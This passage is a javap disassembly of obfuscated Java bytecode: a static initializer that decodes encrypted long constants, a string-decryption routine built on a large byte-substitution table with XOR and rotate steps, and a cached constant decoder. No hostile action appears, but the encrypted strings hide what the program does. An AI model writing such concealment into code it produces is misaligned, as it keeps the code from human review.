       310: invokevirtual #82                 // Method java/lang/String.intern:()Ljava/lang/String;
       313: swap
       314: pop
       315: swap
       316: tableswitch   { // 0 to 0
                       0: 119
                 default: 49
            }
       336: iconst_3
       337: newarray       long
       339: astore        4
       341: iconst_0
       342: istore_1
       343: ldc           #9                  // String \u001fµûéÎõa\u00876 ÕA.1P°\u001aÚg\u0088Æ<Àþ
       345: dup
       346: astore_2
       347: invokevirtual #76                 // Method java/lang/String.length:()I
       350: istore_3
       351: iconst_0
       352: istore_0
       353: aload_2
       354: iload_0
       355: iinc          0, 8
       358: iload_0
       359: invokevirtual #134                // Method java/lang/String.substring:(II)Ljava/lang/String;
       362: ldc           #12                 // String ISO-8859-1
       364: invokevirtual #165                // Method java/lang/String.getBytes:(Ljava/lang/String;)[B
       367: astore        5
       369: aload         4
       371: iload_1
       372: iinc          1, 1
       375: aload         5
       377: iconst_0
       378: baload
       379: i2l
       380: ldc2_w        #370                // long 255l
       383: land
       384: bipush        56
       386: lshl
       387: aload         5
       389: iconst_1
       390: baload
       391: i2l
       392: ldc2_w        #370                // long 255l
       395: land
       396: bipush        48
       398: lshl
       399: lor
       400: aload         5
       402: iconst_2
       403: baload
       404: i2l
       405: ldc2_w        #370                // long 255l
       408: land
       409: bipush        40
       411: lshl
       412: lor
       413: aload         5
       415: iconst_3
       416: baload
       417: i2l
       418: ldc2_w        #370                // long 255l
       421: land
       422: bipush        32
       424: lshl
       425: lor
       426: aload         5
       428: iconst_4
       429: baload
       430: i2l
       431: ldc2_w        #370                // long 255l
       434: land
       435: bipush        24
       437: lshl
       438: lor
       439: aload         5
       441: iconst_5
       442: baload
       443: i2l
       444: ldc2_w        #370                // long 255l
       447: land
       448: bipush        16
       450: lshl
       451: lor
       452: aload         5
       454: bipush        6
       456: baload
       457: i2l
       458: ldc2_w        #370                // long 255l
       461: land
       462: bipush        8
       464: lshl
       465: lor
       466: aload         5
       468: bipush        7
       470: baload
       471: i2l
       472: ldc2_w        #370                // long 255l
       475: land
       476: lor
       477: iconst_m1
       478: goto          502
       481: lastore
       482: iload_0
       483: iload_3
       484: if_icmplt     353
       487: aload         4
       489: putstatic     #24                 // Field d:[J
       492: iconst_3
       493: anewarray     #336                // class java/lang/Long
       496: putstatic     #271                // Field e:[Ljava/lang/Long;
       499: goto          513
       502: dup_x2
       503: pop
       504: lload         6
       506: lxor
       507: dup2_x1
       508: pop2
       509: pop
       510: goto          481
       513: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        -2825
         6: ixor
         7: ldc           #15                 // int 65535
         9: iand
        10: istore_3
        11: getstatic     #91                 // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #248                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #202                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1077
                       2: 1082
                       3: 1088
                       4: 1093
                       5: 1099
                       6: 1104
                       7: 1110
                       8: 1115
                       9: 1120
                      10: 1125
                      11: 1130
                      12: 1136
                      13: 1141
                      14: 1147
                      15: 1152
                      16: 1157
                      17: 1163
                      18: 1168
                      19: 1173
                      20: 1179
                      21: 1185
                      22: 1191
                      23: 1197
                      24: 1203
                      25: 1209
                      26: 1214
                      27: 1219
                      28: 1225
                      29: 1230
                      30: 1236
                      31: 1241
                      32: 1246
                      33: 1252
                      34: 1258
                      35: 1264
                      36: 1269
                      37: 1275
                      38: 1280
                      39: 1286
                      40: 1292
                      41: 1297
                      42: 1302
                      43: 1307
                      44: 1312
                      45: 1318
                      46: 1323
                      47: 1329
                      48: 1334
                      49: 1339
                      50: 1344
                      51: 1350
                      52: 1355
                      53: 1360
                      54: 1366
                      55: 1372
                      56: 1376
                      57: 1382
                      58: 1388
                      59: 1394
                      60: 1399
                      61: 1404
                      62: 1409
                      63: 1414
                      64: 1420
                      65: 1426
                      66: 1430
                      67: 1435
                      68: 1440
                      69: 1445
                      70: 1451
                      71: 1457
                      72: 1463
                      73: 1469
                      74: 1474
                      75: 1479
                      76: 1484
                      77: 1489
                      78: 1494
                      79: 1499
                      80: 1505
                      81: 1510
                      82: 1516
                      83: 1521
                      84: 1526
                      85: 1531
                      86: 1535
                      87: 1541
                      88: 1546
                      89: 1552
                      90: 1557
                      91: 1563
                      92: 1568
                      93: 1573
                      94: 1579
                      95: 1585
                      96: 1591
                      97: 1596
                      98: 1602
                      99: 1607
                     100: 1612
                     101: 1618
                     102: 1623
                     103: 1628
                     104: 1634
                     105: 1640
                     106: 1644
                     107: 1649
                     108: 1654
                     109: 1660
                     110: 1666
                     111: 1671
                     112: 1676
                     113: 1681
                     114: 1687
                     115: 1693
                     116: 1699
                     117: 1704
                     118: 1709
                     119: 1715
                     120: 1721
                     121: 1727
                     122: 1733
                     123: 1738
                     124: 1744
                     125: 1749
                     126: 1754
                     127: 1759
                     128: 1764
                     129: 1769
                     130: 1774
                     131: 1779
                     132: 1785
                     133: 1791
                     134: 1797
                     135: 1803
                     136: 1809
                     137: 1814
                     138: 1820
                     139: 1825
                     140: 1830
                     141: 1836
                     142: 1841
                     143: 1846
                     144: 1851
                     145: 1857
                     146: 1863
                     147: 1868
                     148: 1873
                     149: 1878
                     150: 1884
                     151: 1890
                     152: 1896
                     153: 1902
                     154: 1908
                     155: 1914
                     156: 1919
                     157: 1924
                     158: 1930
                     159: 1935
                     160: 1941
                     161: 1946
                     162: 1952
                     163: 1958
                     164: 1963
                     165: 1969
                     166: 1974
                     167: 1979
                     168: 1984
                     169: 1989
                     170: 1994
                     171: 2000
                     172: 2006
                     173: 2012
                     174: 2017
                     175: 2022
                     176: 2027
                     177: 2032
                     178: 2038
                     179: 2043
                     180: 2048
                     181: 2054
                     182: 2059
                     183: 2065
                     184: 2071
                     185: 2076
                     186: 2082
                     187: 2088
                     188: 2093
                     189: 2099
                     190: 2105
                     191: 2110
                     192: 2116
                     193: 2122
                     194: 2127
                     195: 2133
                     196: 2139
                     197: 2144
                     198: 2149
                     199: 2155
                     200: 2160
                     201: 2166
                     202: 2171
                     203: 2177
                     204: 2183
                     205: 2188
                     206: 2194
                     207: 2200
                     208: 2206
                     209: 2212
                     210: 2218
                     211: 2224
                     212: 2228
                     213: 2233
                     214: 2239
                     215: 2245
                     216: 2251
                     217: 2257
                     218: 2263
                     219: 2268
                     220: 2273
                     221: 2278
                     222: 2283
                     223: 2287
                     224: 2293
                     225: 2299
                     226: 2305
                     227: 2311
                     228: 2317
                     229: 2323
                     230: 2328
                     231: 2334
                     232: 2340
                     233: 2345
                     234: 2350
                     235: 2355
                     236: 2361
                     237: 2367
                     238: 2372
                     239: 2378
                     240: 2384
                     241: 2389
                     242: 2395
                     243: 2400
                     244: 2405
                     245: 2411
                     246: 2417
                     247: 2422
                     248: 2428
                     249: 2434
                     250: 2440
                     251: 2446
                     252: 2452
                     253: 2458
                     254: 2463
                 default: 2468
            }
      1072: bipush        60
      1074: goto          2471
      1077: bipush        71
      1079: goto          2471
      1082: sipush        173
      1085: goto          2471
      1088: bipush        6
      1090: goto          2471
      1093: sipush        182
      1096: goto          2471
      1099: bipush        78
      1101: goto          2471
      1104: sipush        163
      1107: goto          2471
      1110: bipush        90
      1112: goto          2471
      1115: bipush        19
      1117: goto          2471
      1120: bipush        61
      1122: goto          2471
      1125: bipush        23
      1127: goto          2471
      1130: sipush        235
      1133: goto          2471
      1136: bipush        112
      1138: goto          2471
      1141: sipush        198
      1144: goto          2471
      1147: bipush        29
      1149: goto          2471
      1152: bipush        115
      1154: goto          2471
      1157: sipush        171
      1160: goto          2471
      1163: bipush        55
      1165: goto          2471
      1168: bipush        67
      1170: goto          2471
      1173: sipush        178
      1176: goto          2471
      1179: sipush        237
      1182: goto          2471
      1185: sipush        138
      1188: goto          2471
      1191: sipush        208
      1194: goto          2471
      1197: sipush        232
      1200: goto          2471
      1203: sipush        224
      1206: goto          2471
      1209: bipush        27
      1211: goto          2471
      1214: bipush        122
      1216: goto          2471
      1219: sipush        156
      1222: goto          2471
      1225: bipush        44
      1227: goto          2471
      1230: sipush        184
      1233: goto          2471
      1236: bipush        92
      1238: goto          2471
      1241: bipush        106
      1243: goto          2471
      1246: sipush        229
      1249: goto          2471
      1252: sipush        191
      1255: goto          2471
      1258: sipush        199
      1261: goto          2471
      1264: bipush        126
      1266: goto          2471
      1269: sipush        207
      1272: goto          2471
      1275: bipush        58
      1277: goto          2471
      1280: sipush        240
      1283: goto          2471
      1286: sipush        195
      1289: goto          2471
      1292: bipush        118
      1294: goto          2471
      1297: bipush        59
      1299: goto          2471
      1302: bipush        15
      1304: goto          2471
      1307: bipush        33
      1309: goto          2471
      1312: sipush        252
      1315: goto          2471
      1318: bipush        41
      1320: goto          2471
      1323: sipush        183
      1326: goto          2471
      1329: bipush        9
      1331: goto          2471
      1334: bipush        47
      1336: goto          2471
      1339: bipush        80
      1341: goto          2471
      1344: sipush        134
      1347: goto          2471
      1350: bipush        98
      1352: goto          2471
      1355: bipush        7
      1357: goto          2471
      1360: sipush        223
      1363: goto          2471
      1366: sipush        246
      1369: goto          2471
      1372: iconst_1
      1373: goto          2471
      1376: sipush        158
      1379: goto          2471
      1382: sipush        160
      1385: goto          2471
      1388: sipush        192
      1391: goto          2471
      1394: bipush        79
      1396: goto          2471
      1399: bipush        66
      1401: goto          2471
      1404: bipush        73
      1406: goto          2471
      1409: bipush        18
      1411: goto          2471
      1414: sipush        254
      1417: goto          2471
      1420: sipush        140
      1423: goto          2471
      1426: iconst_3
      1427: goto          2471
      1430: bipush        54
      1432: goto          2471
      1435: bipush        21
      1437: goto          2471
      1440: bipush        42
      1442: goto          2471
      1445: sipush        227
      1448: goto          2471
      1451: sipush        247
      1454: goto          2471
      1457: sipush        139
      1460: goto          2471
      1463: sipush        146
      1466: goto          2471
      1469: bipush        12
      1471: goto          2471
      1474: bipush        39
      1476: goto          2471
      1479: bipush        99
      1481: goto          2471
      1484: bipush        50
      1486: goto          2471
      1489: bipush        94
      1491: goto          2471
      1494: bipush        101
      1496: goto          2471
      1499: sipush        152
      1502: goto          2471
      1505: bipush        91
      1507: goto          2471
      1510: sipush        185
      1513: goto          2471
      1516: bipush        97
      1518: goto          2471
      1521: bipush        43
      1523: goto          2471
      1526: bipush        89
      1528: goto          2471
      1531: iconst_2
      1532: goto          2471
      1535: sipush        214
      1538: goto          2471
      1541: bipush        116
      1543: goto          2471
      1546: sipush        169
      1549: goto          2471
      1552: bipush        123
      1554: goto          2471
      1557: sipush        238
      1560: goto          2471
      1563: bipush        81
      1565: goto          2471
      1568: bipush        37
      1570: goto          2471
      1573: sipush        162
      1576: goto          2471
      1579: sipush        174
      1582: goto          2471
      1585: sipush        242
      1588: goto          2471
      1591: bipush        38
      1593: goto          2471
      1596: sipush        201
      1599: goto          2471
      1602: bipush        70
      1604: goto          2471
      1607: bipush        102
      1609: goto          2471
      1612: sipush        250
      1615: goto          2471
      1618: bipush        11
      1620: goto          2471
      1623: bipush        104
      1625: goto          2471
      1628: sipush        219
      1631: goto          2471
      1634: sipush        226
      1637: goto          2471
      1640: iconst_5
      1641: goto          2471
      1644: bipush        10
      1646: goto          2471
      1649: bipush        16
      1651: goto          2471
      1654: sipush        210
      1657: goto          2471
      1660: sipush        170
      1663: goto          2471
      1666: bipush        88
      1668: goto          2471
      1671: bipush        24
      1673: goto          2471
      1676: bipush        62
      1678: goto          2471
      1681: sipush        209
      1684: goto          2471
      1687: sipush        230
      1690: goto          2471
      1693: sipush        220
      1696: goto          2471
      1699: bipush        36
      1701: goto          2471
      1704: bipush        125
      1706: goto          2471
      1709: sipush        206
      1712: goto          2471
      1715: sipush        129
      1718: goto          2471
      1721: sipush        179
      1724: goto          2471
      1727: sipush        131
      1730: goto          2471
      1733: bipush        117
      1735: goto          2471
      1738: sipush        249
      1741: goto          2471
      1744: bipush        20
      1746: goto          2471
      1749: bipush        74
      1751: goto          2471
      1754: bipush        48
      1756: goto          2471
      1759: bipush        22
      1761: goto          2471
      1764: bipush        103
      1766: goto          2471
      1769: bipush        121
      1771: goto          2471
      1774: bipush        69
      1776: goto          2471
      1779: sipush        187
      1782: goto          2471
      1785: sipush        211
      1788: goto          2471
      1791: sipush        165
      1794: goto          2471
      1797: sipush        141
      1800: goto          2471
      1803: sipush        151
      1806: goto          2471
      1809: bipush        127
      1811: goto          2471
      1814: sipush        137
      1817: goto          2471
      1820: bipush        113
      1822: goto          2471
      1825: bipush        119
      1827: goto          2471
      1830: sipush        164
      1833: goto          2471
      1836: bipush        13
      1838: goto          2471
      1841: bipush        31
      1843: goto          2471
      1846: bipush        105
      1848: goto          2471
      1851: sipush        133
      1854: goto          2471
      1857: sipush        143
      1860: goto          2471
      1863: bipush        53
      1865: goto          2471
      1868: bipush        57
      1870: goto          2471
      1873: bipush        8
      1875: goto          2471
      1878: sipush        213
      1881: goto          2471
      1884: sipush        181
      1887: goto          2471
      1890: sipush        222
      1893: goto          2471
      1896: sipush        167
      1899: goto          2471
      1902: sipush        233
      1905: goto          2471
      1908: sipush        231
      1911: goto          2471
      1914: bipush        124
      1916: goto          2471
      1919: bipush        85
      1921: goto          2471
      1924: sipush        190
      1927: goto          2471
      1930: bipush        83
      1932: goto          2471
      1935: sipush        135
      1938: goto          2471
      1941: bipush        49
      1943: goto          2471
      1946: sipush        234
      1949: goto          2471
      1952: sipush        150
      1955: goto          2471
      1958: bipush        84
      1960: goto          2471
      1963: sipush        215
      1966: goto          2471
      1969: bipush        72
      1971: goto          2471
      1974: bipush        109
      1976: goto          2471
      1979: bipush        68
      1981: goto          2471
      1984: bipush        46
      1986: goto          2471
      1989: bipush        26
      1991: goto          2471
      1994: sipush        166
      1997: goto          2471
      2000: sipush        189
      2003: goto          2471
      2006: sipush        205
      2009: goto          2471
      2012: bipush        63
      2014: goto          2471
      2017: bipush        25
      2019: goto          2471
      2022: bipush        52
      2024: goto          2471
      2027: bipush        65
      2029: goto          2471
      2032: sipush        217
      2035: goto          2471
      2038: bipush        76
      2040: goto          2471
      2043: bipush        17
      2045: goto          2471
      2048: sipush        202
      2051: goto          2471
      2054: bipush        111
      2056: goto          2471
      2059: sipush        216
      2062: goto          2471
      2065: sipush        154
      2068: goto          2471
      2071: bipush        51
      2073: goto          2471
      2076: sipush        196
      2079: goto          2471
      2082: sipush        136
      2085: goto          2471
      2088: bipush        14
      2090: goto          2471
      2093: sipush        142
      2096: goto          2471
      2099: sipush        236
      2102: goto          2471
      2105: bipush        82
      2107: goto          2471
      2110: sipush        155
      2113: goto          2471
      2116: sipush        204
      2119: goto          2471
      2122: bipush        28
      2124: goto          2471
      2127: sipush        130
      2130: goto          2471
      2133: sipush        159
      2136: goto          2471
      2139: bipush        34
      2141: goto          2471
      2144: bipush        87
      2146: goto          2471
      2149: sipush        161
      2152: goto          2471
      2155: bipush        35
      2157: goto          2471
      2160: sipush        148
      2163: goto          2471
      2166: bipush        32
      2168: goto          2471
      2171: sipush        157
      2174: goto          2471
      2177: sipush        218
      2180: goto          2471
      2183: bipush        107
      2185: goto          2471
      2188: sipush        221
      2191: goto          2471
      2194: sipush        147
      2197: goto          2471
      2200: sipush        197
      2203: goto          2471
      2206: sipush        180
      2209: goto          2471
      2212: sipush        168
      2215: goto          2471
      2218: sipush        255
      2221: goto          2471
      2224: iconst_4
      2225: goto          2471
      2228: bipush        95
      2230: goto          2471
      2233: sipush        145
      2236: goto          2471
      2239: sipush        132
      2242: goto          2471
      2245: sipush        200
      2248: goto          2471
      2251: sipush        248
      2254: goto          2471
      2257: sipush        153
      2260: goto          2471
      2263: bipush        56
      2265: goto          2471
      2268: bipush        114
      2270: goto          2471
      2273: bipush        108
      2275: goto          2471
      2278: bipush        96
      2280: goto          2471
      2283: iconst_0
      2284: goto          2471
      2287: sipush        188
      2290: goto          2471
      2293: sipush        193
      2296: goto          2471
      2299: sipush        243
      2302: goto          2471
      2305: sipush        212
      2308: goto          2471
      2311: sipush        186
      2314: goto          2471
      2317: sipush        194
      2320: goto          2471
      2323: bipush        64
      2325: goto          2471
      2328: sipush        253
      2331: goto          2471
      2334: sipush        149
      2337: goto          2471
      2340: bipush        77
      2342: goto          2471
      2345: bipush        110
      2347: goto          2471
      2350: bipush        30
      2352: goto          2471
      2355: sipush        244
      2358: goto          2471
      2361: sipush        176
      2364: goto          2471
      2367: bipush        75
      2369: goto          2471
      2372: sipush        239
      2375: goto          2471
      2378: sipush        225
      2381: goto          2471
      2384: bipush        40
      2386: goto          2471
      2389: sipush        228
      2392: goto          2471
      2395: bipush        100
      2397: goto          2471
      2400: bipush        86
      2402: goto          2471
      2405: sipush        175
      2408: goto          2471
      2411: sipush        128
      2414: goto          2471
      2417: bipush        120
      2419: goto          2471
      2422: sipush        177
      2425: goto          2471
      2428: sipush        241
      2431: goto          2471
      2434: sipush        245
      2437: goto          2471
      2440: sipush        172
      2443: goto          2471
      2446: sipush        144
      2449: goto          2471
      2452: sipush        251
      2455: goto          2471
      2458: bipush        45
      2460: goto          2471
      2463: bipush        93
      2465: goto          2471
      2468: sipush        203
      2471: istore        5
      2473: iload_1
      2474: iload_2
      2475: ixor
      2476: dup
      2477: istore_1
      2478: sipush        255
      2481: iand
      2482: iload         5
      2484: isub
      2485: istore        6
      2487: iload         6
      2489: ifge          2498
      2492: iinc_w        6, 256
      2498: iload_1
      2499: ldc           #15                 // int 65535
      2501: iand
      2502: bipush        8
      2504: iushr
      2505: iload         5
      2507: isub
      2508: istore        7
      2510: iload         7
      2512: ifge          2521
      2515: iinc_w        7, 256
      2521: iconst_0
      2522: istore        8
      2524: goto          2602
      2527: iload         8
      2529: iconst_2
      2530: irem
      2531: istore        9
      2533: aload         4
      2535: iload         8
      2537: dup2
      2538: caload
      2539: iload         9
      2541: ifne          2573
      2544: iload         6
      2546: ixor
      2547: i2c
      2548: castore
      2549: iload         6
      2551: iconst_3
      2552: iushr
      2553: iload         6
      2555: iconst_5
      2556: ishl
      2557: ior
      2558: aload         4
      2560: iload         8
      2562: caload
      2563: ixor
      2564: sipush        255
      2567: iand
      2568: istore        6
      2570: goto          2599
      2573: iload         7
      2575: ixor
      2576: i2c
      2577: castore
      2578: iload         7
      2580: iconst_3
      2581: iushr
      2582: iload         7
      2584: iconst_5
      2585: ishl
      2586: ior
      2587: aload         4
      2589: iload         8
      2591: caload
      2592: ixor
      2593: sipush        255
      2596: iand
      2597: istore        7
      2599: iinc          8, 1
      2602: iload         8
      2604: aload         4
      2606: arraylength
      2607: if_icmplt     2527
      2610: getstatic     #91                 // Field b:[Ljava/lang/String;
      2613: iload_3
      2614: new           #157                // class java/lang/String
      2617: dup
      2618: aload         4
      2620: invokespecial #217                // Method java/lang/String."<init>":([C)V
      2623: invokevirtual #82                 // Method java/lang/String.intern:()Ljava/lang/String;
      2626: aastore
      2627: getstatic     #91                 // Field b:[Ljava/lang/String;
      2630: iload_3
      2631: aaload
      2632: areturn

  private static long a(int, long);
    Code:
         0: iload_0
         1: lload_1
         2: l2i
         3: ixor
         4: sipush        26062
         7: ixor
         8: sipush        32767
        11: iand
        12: istore_3
        13: getstatic     #271                // Field e:[Ljava/lang/Long;
        16: iload_3
        17: aaload
        18: ifnonnull     36
        21: getstatic     #271                // Field e:[Ljava/lang/Long;
        24: iload_3
        25: getstatic     #24                 // Field d:[J
        28: iload_3
        29: laload
        30: lload_1
        31: lxor
        32: invokestatic  #356                // Method java/lang/Long.valueOf:(J)Ljava/lang/Long;
        35: aastore
        36: getstatic     #271                // Field e:[Ljava/lang/Long;
        39: iload_3
        40: aaload
        41: invokevirtual #114                // Method java/lang/Long.longValue:()J
        44: lreturn
}
